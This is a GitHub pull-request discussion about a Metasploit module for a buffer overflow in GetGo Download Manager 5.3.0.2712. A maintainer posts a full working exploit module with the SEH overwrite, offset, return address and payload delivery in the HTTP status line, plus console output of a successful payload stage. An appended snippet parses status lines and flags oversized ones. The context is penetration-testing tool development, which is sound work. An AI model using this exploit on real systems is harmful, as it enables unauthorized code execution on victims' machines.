Add GetGo Download Manager bof exploit #9642

Merged (6 commits, Oct 15, 2018)

Conversation

Auxilus (Contributor) commented Feb 27, 2018

GetGo Download Manager 5.3.0.2712 - Buffer Overflow
https://www.exploit-db.com/exploits/44187/

Verification

  • Start msfconsole
  • use exploit/windows/smb/getgo_bof
  • set RHOST
  • exploit

@asoto-r7 asoto-r7 self-assigned this Mar 2, 2018
asoto-r7 (Contributor) commented Mar 2, 2018

Hey @Auxilus, thanks for the submission and for reaching out on our Slack! Two pieces of quick feedback, and a third, more involved item:

  1. Would you update the documentation to include the commands used, and an example output from a successful exploit? For a good example, check out plugx.md. Note that they've provided step-by-step walkthrough instructions and example output from Metasploit.

  2. Since we're exploiting the browser inside the GetGo software, I would suggest moving the exploit from misc to browser. To do this, you'd need to move the file from modules/exploits/windows/misc/getgo_bof.rb to modules/exploits/windows/browser/getgo_bof.rb.

  3. In testing the module, I compared it to the ExploitDB code and there's one major difference we'll need to tackle. Looking at the POC's comments:

  1. setup listener 443 on attacking machine
  2. run script on attacking machine
  3. open app on victim machine
  4. go to download
  5. select new, add http://attackerip to URL, index.html to File Name, and select OK

(Note: You should disregard that the above says "port 443", when the code is actually listening on port 80. They're referring to the port the payload will call back on.)

The exploit works by setting up an HTTP listener on port 80 on the attacker's box, then having the victim visit the attacker's HTTP listener. But the exploit code here does not listen; instead it tries to connect to the attacker. In other words:

The working ExploitDB version does this:

/-----------\    exploit   /------------\
|   VICTIM  |      -->     |  ATTACKER  |
\-----------/              \------------/


The not-working Metasploit module is trying this:

/-----------\    exploit   /------------\
|   VICTIM  |      <--     |  ATTACKER  |
\-----------/              \------------/

Since the victim is not listening on port 80, the exploit fails.

So, we'll need to modify the Metasploit module to listen on port 80. To do that, I would start with swapping out Msf::Exploit::Remote::Tcp for Msf::Exploit::Remote::HttpServer::HTML, which is documented here and used in these similar modules: aim_goaway, mirc_irc_url

Hopefully that's enough to give you a solid start. Feel free to reach out with any questions.

Thanks again!

Auxilus (Contributor, Author) commented Mar 2, 2018

@asoto-r7 thanks for the info. Yes, I did figure that out. I used Msf::Exploit::Remote::HttpServer::HTML.
Afaik this HttpServer doesn't create the actual file described by URIPATH, so the software is giving a file not found error.
But opening the URL in Chrome/Firefox prints out the exploit.

Auxilus (Contributor, Author) commented Mar 2, 2018

I'll update the documentation as soon as I get the exploit to work.

@jrobles-r7 jrobles-r7 added docs and removed needs-docs labels Mar 6, 2018
asoto-r7 (Contributor) commented:

@Auxilus : Hey, how's it going? Any updates?

Auxilus (Contributor, Author) commented Mar 19, 2018

Something's wrong, the software gives a file not found error. I'm gonna pull up Wireshark... Maybe tomorrow..

BTW the original python script works fine...

Auxilus (Contributor, Author) commented Mar 19, 2018

The exploit crashes the software on Windows XP but no session is opened... I don't think I can debug that, I might need some help.

@wchen-r7 wchen-r7 self-assigned this Oct 5, 2018
wchen-r7 (Contributor) commented Oct 5, 2018

Sorry we've lost momentum in this pull request. I'll take a look and see what I can figure out. Thank you.

wchen-r7 (Contributor) commented:

Hi @Auxilus (cc @asoto-r7 ), so I figured out what's wrong with it. Turns out you're just not exploiting the buffer correctly. If you send the data in the HTTP response status instead of the HTTP body, you can overflow it and gain code execution. So I rewrote the exploit for you:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Getgosoft Getgo Download Manager Buffer Overflow',
      'Description'    => %q{
        This exploits a buffer overflow vulnerability against
        Getgosoft Getgo Download Manager.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bzyo' # Ported PoC to metasploit
        ],
      'References'     =>
        [
          [ 'EDB', '44187' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'SRVPORT'  => 80
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # The null byte is the only bad char for the payload
          'BadChars'   => "\x00"
        },
      'Targets'        =>
        [
          [ 'GetGo Download Manager v5.3.0.2712',
            {
              'Offset'  => 4095,
              # 0:016> u 0x72d11f39
              # msacm32!wodMessage+0xd0f:
              # 72d11f39 5f              pop     edi
              # 72d11f3a 5e              pop     esi
              # 72d11f3b c20400          ret     4
              'Ret'     => 0x72d11f39,
              # 12253 is the same size the python PoC used
              'MaxSize' => 12253
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Feb 27 2018',
      'DefaultTarget'  => 0))
  end

  def send_exploit(cli)
    seh_record = generate_seh_record(target.ret)
    # Minus 4 for the SEH record
    buffer = "A" * (target['Offset'] - 4)
    buffer << seh_record
    #buffer << (0x01..0xff).to_a.pack('C*')
    buffer << payload.encoded
    buffer << "D" * (target['MaxSize'] - buffer.length)
    res = create_response(200, buffer)
    cli.send_response(res)
  end

  def on_request_uri(cli, request)
    if request.headers['User-Agent'].to_s.include?('GetGo Download Manager')
      print_status("Attempting to exploit #{cli.peerhost}")
      send_exploit(cli)
    else
      print_error("#{cli.peerhost} isn't connecting with the right browser. Sending 404")
      send_not_found(cli)
    end
  end
end

=begin
[*] Using URL: http://0.0.0.0:80/1XBWCE8s2j0HUa
[*] Local IP: http://192.168.0.12:80/1XBWCE8s2j0HUa
[*] Server started.
[*] 192.168.0.34     getgo_bof - Attempting to exploit 192.168.0.34
[*] Sending stage (180291 bytes) to 192.168.0.34
=end

However, I suspect this exploit might be the same as https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/getgodm_http_response_bof.rb, let me take a look at that....
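The comment above locates the overflow in the HTTP status line rather than the body: the client copies the reason phrase into a fixed buffer without checking its length. The following added example (not part of the PR or the module) shows the bounded parse a client or inspection proxy should perform; the 256-byte cap and the `HTTP/1.1 <code> <reason>` rendering of `create_response` are assumptions, and both sample responses are constructed.

```ruby
# Assumed sane cap on the reason phrase; RFC 7230 sets no limit, so the
# receiving side must enforce one before copying the text anywhere.
MAX_REASON_LEN = 256

class OversizedStatusLine < StandardError; end
class MalformedStatusLine < StandardError; end

# Returns [code, reason] for a well-formed status line whose reason phrase
# fits the cap. Length is checked before the text is used for anything.
def parse_status_line(raw)
  line = raw.partition("\r\n").first
  m = /\AHTTP\/1\.[01] (\d{3}) (.*)\z/.match(line)
  raise MalformedStatusLine, "not an HTTP/1.x status line" unless m
  reason = m[2]
  if reason.bytesize > MAX_REASON_LEN
    raise OversizedStatusLine,
          "reason phrase is #{reason.bytesize} bytes (cap #{MAX_REASON_LEN})"
  end
  [m[1].to_i, reason]
end

# Classifies a raw response for logging or alerting. A response that trips
# the cap is the shape a client-side status-line overflow attempt takes.
def classify_response(raw)
  code, reason = parse_status_line(raw)
  { verdict: :ok, code: code, reason: reason }
rescue OversizedStatusLine => e
  { verdict: :suspicious, detail: e.message }
rescue MalformedStatusLine => e
  { verdict: :malformed, detail: e.message }
end

# Constructed samples: a normal response, and one whose reason phrase has
# the 12253-byte size the module's MaxSize uses, filled with a marker byte.
BENIGN_RESPONSE    = "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
OVERSIZED_RESPONSE = "HTTP/1.1 200 " + ("A" * 12253) + "\r\n\r\n"

if __FILE__ == $0
  puts classify_response(BENIGN_RESPONSE).inspect
  puts classify_response(OVERSIZED_RESPONSE).inspect
end
```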

wchen-r7 (Contributor) commented:

@Auxilus So it turns out they are the same thing, but the current one targets an older version of the app, and requires an update. What I'll do here is update that module with you credited, and then I'll close the PR. Thanks for the submission!

Auxilus (Contributor, Author) commented Oct 15, 2018

Thanks @wchen-r7, much appreciated 😀

@wchen-r7 wchen-r7 merged commit ad7a241 into rapid7:master Oct 15, 2018
wchen-r7 (Contributor) commented Oct 15, 2018

Release Notes

The GetGo Download Manager buffer overflow exploit now supports version 5. Documentation for the module has also been added.

@gdavidson-r7 gdavidson-r7 added the rn-enhancement release notes enhancement label Oct 23, 2018
Labels: docs, module, rn-enhancement (release notes enhancement)